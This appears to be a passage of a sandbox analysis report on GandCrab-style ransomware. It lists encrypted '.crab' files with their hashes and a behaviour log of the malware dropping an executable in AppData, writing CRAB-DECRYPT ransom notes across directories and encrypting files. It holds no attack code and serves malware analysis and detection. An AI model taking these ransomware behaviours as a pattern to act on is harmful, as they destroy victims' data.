SHA1: c69fd32cce377d8e663e3b079ff2cbbf9cf897f8
SHA256: 30bfa1b114a2e9de113b8e46a9d08fe542436207cb226ce1e8a88a85509413e0
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata.crab 0.55 KB MD5: b034f7788d4ea1bc175c7cccffd78bbf
SHA1: c276328465e2fbe31d949b44e80e876c17f29553
SHA256: 26e0854db0151dbd9ba6750c75378331f5f115618cf415fd67eacffbdf8382d0
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2.crab 0.57 KB MD5: 8f74971aea96385204fb73778dbc5161
SHA1: 07e9b0100c7dbac75ca8d84882a773c80e05e3b6
SHA256: 6cf28b5ba77db9e84162aacde1a6aacf7196cbf9482075e84542cc14a8160c4b
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite.crab 176.51 KB MD5: 4851322d07848094c12123b1e617a380
SHA1: 55363070e2fe8cffb3473e7aba75f50d2e314da6
SHA256: 4a2cae2a6dd771635a3152f7fa7bf52e20fa034cb956e72cfc23f6e0000df905
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\storage.sqlite.crab 1.01 KB MD5: 383d951b81af70857da482f3e4cee452
SHA1: 49244f04381cb858afdb187a24d3e84025a8de1e
SHA256: 9628930cf9cbfb8f025d9c2e50ee999b185dc7d3df72b6e222e2b7593499e4d7
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\times.json.crab 0.54 KB MD5: b1c762c78ff03feae90a140444865ce8
SHA1: 7f9cbb75cd1758ae88a3317fb0f1a41545a0bc50
SHA256: 0ddbe6304f5cd77767a805cce80dbf2bdbfb6daf636e8f2aef76fefbeab7365c
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\webappsstore.sqlite.crab 96.51 KB MD5: 48b6fbc429e4cfc24f34d2af0e13076d
SHA1: e5aedb77fb7ee9359937909a0d27291c2e34ae62
SHA256: a2cb38c5a7fdc7892620973fc0dbc8a3fa309d6cce3c79a180ec616bddf5b00d
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\xulstore.json.crab 0.91 KB MD5: cd7dfa0ee0676bb0093c6f8b45abc8dd
SHA1: 41870542be98d4532e1d11cae97dc365b0bb6283
SHA256: 36970f26278487af4344d155c1a10c7a2b1f3b6002a76bfe6409a76f5841fc87
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles.ini.crab 0.63 KB MD5: cb604d48605dce97d5ebdfc7bf4861f0
SHA1: 67dbc85f9b24db52090fce94632f2f2db374f39d
SHA256: 6586fd50d50aae78ed69cd313c059751c7a1ff474aadcf437f7699ee96fc7eb5
False
c:\users\fd1hvy\appdata\roaming\mtxc 3v.avi.crab 93.04 KB MD5: 37863e1538760d0c5017e7df051e0024
SHA1: b63cc8bee39a0e71cd0b04433a86179e0032eefd
SHA256: 50008d8a73dcd9907fd52c88d4ae461cc95e20d96c6880933edd4b5e065f8b9c
False
c:\users\fd1hvy\appdata\roaming\ndxx_aclmr8id.jpg.crab 7.68 KB MD5: 90c339b9c39bae8aa84ff7037b5615ea
SHA1: 3eb15962aae30d65b9f6a4653db39962b9bc34ef
SHA256: 557993af3520c284a440e3eab25bcbe7beff866a7f83690c278c953f23eef084
False
c:\users\fd1hvy\appdata\roaming\nqg5jvy_8vylos.avi.crab 27.32 KB MD5: b08a0817705e7e06aeb2cfb0501acc4b
SHA1: 0abc640be68a66fce8ad050be7f45743b0ce49bd
SHA256: 9f38035a8917551672b147c4e654809a19db3b9481784d55b333e85c7cde84e3
False
c:\users\fd1hvy\appdata\roaming\p-6j-4erjllwgu.odt.crab 63.90 KB MD5: 6203da6f4b7964a02a225de84080253d
SHA1: 92fffe80dd417aae3a444b8a587d3f05a3c006df
SHA256: 11d23be91ec76696806d15ce94f43426765002da2d500cc149ac17126dc01b38
False
c:\users\fd1hvy\appdata\roaming\q-bzlpjgvn.wav.crab 2.30 KB MD5: 9d97617146228c68e8e3a57b17c698a9
SHA1: 6d23dd01f1750b6b8f0fafa796083c92070f91c1
SHA256: 488fc950a24444872faa723ee79b5f9445968f67df6b7d1a73765909a63238b4
False
c:\users\fd1hvy\appdata\roaming\skype\roottools\roottools.conf.crab 0.59 KB MD5: b4242d7a84e108c80be7e967829149ae
SHA1: 5f3798c1ca8d19b7fa7fbc4dbecfbf1e1628b847
SHA256: e50235dc6249e9c8f4d4c0ba17e503f0d9f2f870bfde9a30963eaf156b74b357
False
c:\users\fd1hvy\appdata\roaming\th-sgxsacxatfhs.mp3.crab 92.26 KB MD5: 01585fd730857068dfd3b8841d51a9e0
SHA1: 812a6364f79ecdc4d294f19649c69ff313a7083d
SHA256: 865e4efa7adffe2b1ad471dec2d3ead2542750a7ce7b31f49c1642e435c76420
False
c:\users\fd1hvy\appdata\roaming\tmxyfrsx11ckd.gif.crab 87.37 KB MD5: ca59e274b2f8cd4f2418b26b698e0fc4
SHA1: ca58ffb7ba8dabd06f35ebeaed072dc66497f206
SHA256: d02baf1663bab5b0f7f0ef9e5c6cda26f3fb27f85c7b5ef9bbc4bdff6ed33f08
False
c:\users\fd1hvy\appdata\roaming\v07ls34tti2e2.pptx.crab 36.84 KB MD5: 7ed2106e005cdf9306f129a5d3a2600e
SHA1: 442a8cd6ab0755979309e59788c611013d28853c
SHA256: 74417a0d720395e4fa71a014bf668111ee71006832095055b457bf48cbedc5ac
False
c:\users\fd1hvy\appdata\roaming\xiyjzucazkp7fi8xtdfz.wav.crab 46.13 KB MD5: 5a5d556710b23275521c34150f4dd5b8
SHA1: 1c7da574e6a37e98da5d9d9254779eae2def96fc
SHA256: da4c06540ab8f3db834f0987a3c9bba82296ed859f951132a8d8ab6969cebac6
False
c:\users\fd1hvy\appdata\roaming\zcj brzcwq34j_4su.jpg.crab 54.73 KB MD5: aaf92a7440e97b7a63ae6a3789910a56
SHA1: 518c887f8a2bdcb09974d1de3f6f8b3d02f6808d
SHA256: 837bdaeaa14b658bcf237efca2d6060aac01fe545b88924da0f3301f764cbf5d
False
c:\users\fd1hvy\appdata\roaming\zpb7meqh0 cyjol.m4a.crab 37.26 KB MD5: e063c56502179e5ec0081c5658a2ecc1
SHA1: d36fd39c6e9fabe09f95e73eceae5f9abbc556d1
SHA256: a25d6a217198ae15fe9774079b4f695cab39b90747bf8ea80fbaff348d5ec721
False
c:\users\fd1hvy\desktop\3ytnfbfuh2syxvelr.swf.crab 16.66 KB MD5: c8278c37ac0b254c4ec5f793c287b917
SHA1: b93396dc74dc3cc51a98b9a8023275ca7bc034cf
SHA256: ecbc33898a8d510771b2fec5e92386b008662fa66864b95f84518da6aa392a5c
False
c:\users\fd1hvy\desktop\58mwneippjo.ods.crab 46.23 KB MD5: b80402ab80dcde08904cd9a592e9eb91
SHA1: f3fcb819af04ad751800686abfe843a56af5cc14
SHA256: baa7972573679ebbb5d5b862af4d9fe73d234b76b668d31433abb7bb75bf4149
False
c:\users\fd1hvy\desktop\5a0xsisvo9b pz5he.flv.crab 93.84 KB MD5: 2bac7e95040f699d8a1eda05a833da1d
SHA1: fc7147d95c05290f694a01dc0c9dab470614d0c5
SHA256: adf2360ed627cafc9b7863d6cd1e0f40342d8da94d90e495714b70f6faa5328e
False
c:\users\fd1hvy\desktop\6dflkl3w-.swf.crab 75.73 KB MD5: cb009eff5ed70f5608f3b92dc27a0f1b
SHA1: 12890a644339b95e74b7eeeb9ce058b4ade275fd
SHA256: 3a38f3c219cfa81aa2db26c5b009008908c7ffcbecf9a620c937812fdcd8eaac
False
c:\users\fd1hvy\desktop\c7oin7zl ymfby.mkv.crab 80.73 KB MD5: 2703efdf6ee84c947ed3774f96fb1a3e
SHA1: 164460869ec0b850f341d2489c473eec2bcf9276
SHA256: 379a6409045510a5f2f3e539adaa5b0038accdabe381fbf0515c4f48d3cfba8e
False
c:\users\fd1hvy\desktop\cgt8pg5c0n_2xiefr_f.flv.crab 25.12 KB MD5: 2b15737a007669bdbd5dde09b23a182b
SHA1: 547d13c868f2cd41e76468feee708d2ed5555d77
SHA256: eef9de46f2e85de24fb6e2b8ee92e86d90c791ebe3998f8119804037e9a32a00
False
c:\users\fd1hvy\desktop\cokgijbfo.swf.crab 14.80 KB MD5: 196bb61a9e666fb3666d5620447cc471
SHA1: a98a007e8bac6b1e9359653751b2042fe9683263
SHA256: 0366888fd3737c4945f57febdd91e5afa0cbe265be50a6707cfbd4a78c4d3fa5
False
c:\users\fd1hvy\desktop\dckkx1miuzt.xlsx.crab 17.29 KB MD5: 1a108e9da3a05707b00a190dbac8c439
SHA1: 84bcd508694c0bed027c0db50ad4c82800c33c8a
SHA256: 2f203ae4e7658127497ba4a61b0a57b7025bc6c77b5f93a99eea348741b6dc67
False
c:\users\fd1hvy\desktop\jiagdhqzbj.gif.crab 83.18 KB MD5: 6354f6b7f7d78bf9a9f4ad388420971b
SHA1: 6e29fcae585436c890c854dab84b6233e29eee70
SHA256: b720a2f5cba296223c86c987d8bc60dc6cd964651cd44d9f54fa0b9b10a885ee
False
c:\users\fd1hvy\desktop\jxryf3.gif.crab 21.74 KB MD5: 25148c146af4fe26ca07c4a93649a676
SHA1: 2348fd89b057fb088631ef0c0252323edaee82ba
SHA256: 040fd5641e507fac74558441b1a9b2ced6194f84b5a87a982b68fb11cbca3844
False
c:\users\fd1hvy\desktop\ktvotl7\6d4rvnd5zczuhoziuu\0ql6s4uertccqaf-dv.m4a.crab 27.60 KB MD5: 19378060e2671098edf0616c7143cc51
SHA1: 6fcb6bfe24e710150af37e5b94de082fcc7a468d
SHA256: 33537f33f5b5bd1fcee1f598834590675297d90794705e41ff8da9345c08117e
False
c:\users\fd1hvy\desktop\ktvotl7\6d4rvnd5zczuhoziuu\hfrfpxb8mv.flv.crab 87.38 KB MD5: b001cf7d367a9d460f6f573d89f59dbb
SHA1: 53f42fa889377890745acc3a4d472c2f98679830
SHA256: c25b6b83f8c9372aed9b1e0ea15c5aba8a2b6292d9b496ceaf5abfcb40670b4d
False
c:\users\fd1hvy\desktop\ktvotl7\6d4rvnd5zczuhoziuu\npxpxby_sxnq.m4a.crab 6.54 KB MD5: a698a3dc436379741d6b1e0b68a0835e
SHA1: e3f63f120187dbff3ab6ab4d59c6edcf58c59be6
SHA256: fef637519ff7baf0802ead873401a05748a6f541fc903dc78d43fab6b804e2b4
False
c:\users\fd1hvy\desktop\ktvotl7\6d4rvnd5zczuhoziuu\z tadgvnc.gif.crab 56.07 KB MD5: 45b58fb92c40fa7fef581fd6ae08d8c5
SHA1: f03f55b5bb9d372d0931f4374a85c92315cc1831
SHA256: 1000aaeca08620afa6fbe6d7b66807deba77b342e4999290b8eceaf036db8d52
False
c:\users\fd1hvy\desktop\ktvotl7\6d4rvnd5zczuhoziuu\z0c7r042i.gif.crab 66.07 KB MD5: 8679353ac113940435a10f2d5e241e7d
SHA1: be7277a5cae39c3852986e78e7f16a7bb15df423
SHA256: 7d5615dda7452d2700cba747b588e26c4fff8a6e80671237a8009396bb012178
False
c:\users\fd1hvy\desktop\ktvotl7\75_mc9kmrpv.docx.crab 20.07 KB MD5: 56327a2a2ae5c6350884a20d426c604d
SHA1: 8ecb1e6e6c781ee265c1440e564a0ae884f3be8e
SHA256: 23005a2758576733867c826a429643297fd02162301e53b6d8a2537b0f9519d4
False
c:\users\fd1hvy\desktop\ktvotl7\dhbexwswg.mkv.crab 15.41 KB MD5: 70b21038e4449a7e94bc661cd84784c3
SHA1: 2bf6c660953b525ff3a9654063fb06da98651412
SHA256: bda7c3d2e45f36f5908e99a344e88588650dec5ba08ee172e53d78ae3a445e1a
False
c:\users\fd1hvy\desktop\ktvotl7\lehvzlvqqscky\9wmt0mfwi9yy6f_c4.xls.crab 20.38 KB MD5: 6573a49ebfcfeab2ad727d5d3548c255
SHA1: 20e8753ffd6c715ed996febf4edf236878d9690e
SHA256: 11b6420e3ad16424f56199ad4f6cd8356fb2e68c9a2b9c6fcc8e0cd780d16e32
False
c:\users\fd1hvy\desktop\ktvotl7\lehvzlvqqscky\d7b9sc4na0cywewrk-84.wav.crab 59.82 KB MD5: 5b5395a141fa74b38bb36af0fec09222
SHA1: 0dfc4db2de81f9d0f5396c1d4c6f22fbbd4cf8aa
SHA256: 772d87fb5fa5c74409b1761034b9e66db304b32713d4d1bb32f020656e17eacb
False
c:\users\fd1hvy\desktop\ktvotl7\lehvzlvqqscky\ekx86jnwcfyeb.wav.crab 28.12 KB MD5: c2d50136c699f47af3f8a323084f0fb9
SHA1: 14aa1900df3717e3f59c22510968cebbfe2fcd3c
SHA256: 6f9e2a4052d0d7081debaf07308836e96dafada570e2b155f4524016f3050fff
False
c:\users\fd1hvy\desktop\ktvotl7\lehvzlvqqscky\fyqw2kf8c8q6x3ce.png.crab 44.52 KB MD5: 63bdd86c03a02c877f4aae58e61b7200
SHA1: 713e16f1c920384a8238fba885f505e52f465b16
SHA256: 839a9347e08bc44f3199a46052724294a1d42e10973e16a68358b0c1d75b1a14
False
c:\users\fd1hvy\desktop\ktvotl7\lehvzlvqqscky\hn0scrkz4n.avi.crab 53.52 KB MD5: bb3525b19da38c55b29933fec5ec7f78
SHA1: dce12ead82c9e1bae9ee57358cc29069d7324f42
SHA256: c14ebf53d6168462826e2c26c53b8d527757da97205b752c02d1db86207f2b94
False
c:\users\fd1hvy\desktop\ktvotl7\lehvzlvqqscky\lhnkqwe8rphir.ods.crab 76.88 KB MD5: e9410f73014028e62256e3728ebc5bd6
SHA1: 134164e0d27af53fd848bbb8e14c94e89bdab175
SHA256: c545b8fc44b8d7700a7ae3a942a009c1ef73e5c1b45ecde095a096a1c3b20dd5
False
c:\users\fd1hvy\desktop\ktvotl7\nq8n8\1yafu-v.m4a.crab 29.10 KB MD5: a285f2a94025bf35cd0906f3ade283ef
SHA1: b8e5b29b4446bc4cfa22ceb6f295ad4b7c0268bc
SHA256: 1febc00e1b4a57aa11e09b073cf23db3d6bd2db9b69abe49bfc78d40b8faf727
False
c:\users\fd1hvy\desktop\ktvotl7\nq8n8\as1g1e6jqs.flv.crab 45.68 KB MD5: 2741e0db14ea02486ff664bd5f35e4df
SHA1: 59e94d4a60a138f6c0f8183fe35c7b0fde277a28
SHA256: 2e9b0ea1146c05fd6822c61c157f7f4fc3a70eebce6e5943f2b52e330ae02dce
False
c:\users\fd1hvy\desktop\ktvotl7\nq8n8\jddr_ w.csv.crab 54.71 KB MD5: 5aaddfb2cb348c62b7b2fa0102b14da5
SHA1: 185bb7995670724b64de3afceebf809c8d7a997f
SHA256: fc96b3315ce37a1a0eeadb78cd92e4cb624fc47f7ef54e7ec75ba196fe1b1e59
False
c:\users\fd1hvy\desktop\ktvotl7\pegtyk.jpg.crab 38.71 KB MD5: 62c384e67daac1d906632d0e8c57faaf
SHA1: 50139f719e6ef4180cc0b874de0b027759649fc5
SHA256: fb6c028defe697b0e9ea47e38a3c5e7959e7921c3f7dd6e8918ee1f5550976a6
False
c:\users\fd1hvy\desktop\ktvotl7\u9s6.swf.crab 46.20 KB MD5: 1289b4180694beba62fc63c614c41ca8
SHA1: 6529ed79732aa8f9154771595fe14ab7609d6f8a
SHA256: a263511b8bc185985e8ea9639c0559f5cd3d2061bf04e62c3106adb56c7e6547
False
c:\users\fd1hvy\desktop\ktvotl7\_hba.mp3.crab 95.57 KB MD5: 134b9c81c4b174de8eb6187fe625a549
SHA1: abf18aaa3a498cd9797ed2549c015e69ffbb3f3a
SHA256: 16b97ffc5d0378edcec0ae9a0003c00c2f7b95a93b7326689e3780a514957c84
False
c:\users\fd1hvy\desktop\mztnfjefbk1p2f.xlsx.crab 7.02 KB MD5: 5107118c0173a59827ba0fafa40aa3f9
SHA1: e945082402c64fc50ac2d29b93d2190bf926c232
SHA256: d21bcae064fc876437dadf3b4c532961fbcc1f936972f2738fcb16b11baeff75
False
c:\users\fd1hvy\desktop\nat_uuq7k.gif.crab 91.23 KB MD5: 679a1b7cd25933b6e56c4a8e9f369cc3
SHA1: 0eba867bc6fd1fe52479488ffa616d639e99add1
SHA256: 05e2ac69a30d3b73f825ea9fccb351c82cbda549d1158edba7cd9b6e5a9f82d8
False
c:\users\fd1hvy\desktop\osrvpe hbmbs23rh.png.crab 40.96 KB MD5: 01bd55baf0e9118d4774fafdf68ee232
SHA1: cbfa83bc11127eec5af0b9f5f916bed2415b9a28
SHA256: f85548dc2462ca165d2fdd29867f51a62f040a53b009fcd2430f8f9801879063
False
c:\users\fd1hvy\desktop\pdrbvkuud1ueb7.ods.crab 29.02 KB MD5: c8ae3b32396d8e5b9c5837a6e913dc06
SHA1: e57cf6b4e8d36577253c8d2d969be96713a86338
SHA256: 590ee1223dd10173d4af8e472ecc5506d08b7c4198dec47ea40ecae660c88bc8
False
c:\users\fd1hvy\desktop\pqwk.swf.crab 68.74 KB MD5: 5a9c4cc9d25ab9ead15900ac41ca8486
SHA1: 48294fee36725223b4b71fa9ca7d589d467f9cac
SHA256: a3d2341be6dd74b818a2ac909366112b6269da9ae417534d58463837a55e9b09
False
c:\users\fd1hvy\desktop\qgdzgcqfkc.flv.crab 53.04 KB MD5: 20a391d46ae4211098ae405078eb25a6
SHA1: 22843c17e289a84dc29d7e299fa05f2ce4beefa8
SHA256: b72cb4f0f5dbda926fc2f381216efab172a9ed32b5ad6162393ee95807f57992
False
c:\users\fd1hvy\desktop\qmoyhxrd.m4a.crab 73.10 KB MD5: f339971caabf5eab360d9aac9275a3ac
SHA1: 79085e53e0cfb6af44cdcfbd329113d38b3a8c74
SHA256: 544f033f9e8deece636d13d87526854650c80d4dd8d6a7a2e86dec21ac6a1d48
False
c:\users\fd1hvy\desktop\rjm4k-y4s3a.flv.crab 81.40 KB MD5: a271cc0063a89aff630c141abe55d41d
SHA1: 8e32ba7bc1981e9e054a792b55c105d1891e2d74
SHA256: e1cdcbd88a264c74b324e5affcdae53ca5872098c8619073662c780ab5404776
False
c:\users\fd1hvy\desktop\rzoorb.ppt.crab 19.07 KB MD5: 718462d88da8d5c6b5a580da7d2669e1
SHA1: eb1a069580e5f85f48f0a9ca8cb81859d7f63f83
SHA256: 755a70913112ba89afda8e31afe3effae97bef39f8a0b9e2255f37aecfa3f050
False
c:\users\fd1hvy\desktop\sample_file.doc.crab 213.01 KB MD5: cb33a0ea6b98a27a7daebb4f8ee6c9f8
SHA1: 79ea11a42554e8a3023729676dbbac33cfe2e8ed
SHA256: fbad8d83df69450a8f7635c81b7b338c8f26177c9985079c32688ccd52a78949
False
c:\users\fd1hvy\desktop\smacmsm4ectn.mkv.crab 35.34 KB MD5: 23bbca34d65f1f7fe7df87a4e5e3fa9e
SHA1: 5d4d9fe9bf8ec1c9463787d7f1c7d7e747c05649
SHA256: 8d78631074063f77ed248ffd397dba2e0c1a5d16a7fae0064b667d39ad8eeb14
False
c:\users\fd1hvy\desktop\snzid9rwbe.mp3.crab 29.40 KB MD5: 53c8cb1cab11d19e8f7dd568eaeb6808
SHA1: 6151bd91f116c7ebbcfad67f6ed3b73921ebe9b8
SHA256: aad0a78b2bbc64d0713f1085e1a6a23248052d78409d7d1e5bceb755e1993a27
False
c:\users\fd1hvy\desktop\ss9ta-.csv.crab 16.13 KB MD5: 1a08c464e54440ad3a31a3799a4bc8da
SHA1: 5dbc9e721a948ac5fb72812def1ed50dde0c96bc
SHA256: 29d970263a8bf02c735ca41aed3e0a9ba209cca72b78be571a8abf9b7232b552
False
c:\users\fd1hvy\desktop\usiawcyma9lkr7o7pp.mp4.crab 81.10 KB MD5: a1d2f9854ac344b7a7c3730cd9e20ff0
SHA1: a665deacdff5a9dcb2400cfe53c7519e057605ad
SHA256: f4bd14e0d82f850b4591b8d99b77dbf4efde1e0f70be9705b664a7b0f7a2ec32
False
c:\users\fd1hvy\desktop\v72jjy7j e3zet9r.gif.crab 39.35 KB MD5: def7df1e6a9da18d1c1c3e1398b129df
SHA1: d99f98781a586b3362a91196d3a9c86ed2120d25
SHA256: ab0ba97f482b50e75efbb91d389cdba541bc66c3a5a0fe83b1335aaa703dfdfe
False
c:\users\fd1hvy\desktop\vjjvwdcxp7mqmuggf.m4a.crab 67.63 KB MD5: ddfe914632468dc29535587af1cc86cd
SHA1: cbedea15d75709992ac7cca0744f636dbd852395
SHA256: 26ed4314bd05336525a5483b1243d24d3f65e2e47a153032e0623b09ce436fe7
False
c:\users\fd1hvy\desktop\vvlx2.flv.crab 77.13 KB MD5: e87129c9b402db819bdcf22c05b778f9
SHA1: 85f875dbfa51ac081d625f6f94fbcc620673b382
SHA256: 7e108f2ac9cd0b85ced992bc9f51ff69ea11a5216d5d56b897fa15f2f38f29d3
False
Host Behavior
File (3616)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$GetCurrent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$GetCurrent\Logs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$GetCurrent\SafeOS\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1025\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1028\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1029\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1030\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1031\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1032\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1035\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1036\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1037\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1038\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1040\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1041\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1042\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1043\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1044\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1045\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1046\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1049\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1053\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\1055\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\2052\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\2070\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\3076\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\3082\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\Client\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\Extended\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\Graphics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\588bce7c90097ed212\netfx_Core_x64.msi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\netfx_Core_x86.msi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\netfx_Extended.mzz.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\netfx_Extended_x64.msi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\netfx_Extended_x86.msi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\ParameterInfo.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\RGB9RAST_x64.msi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
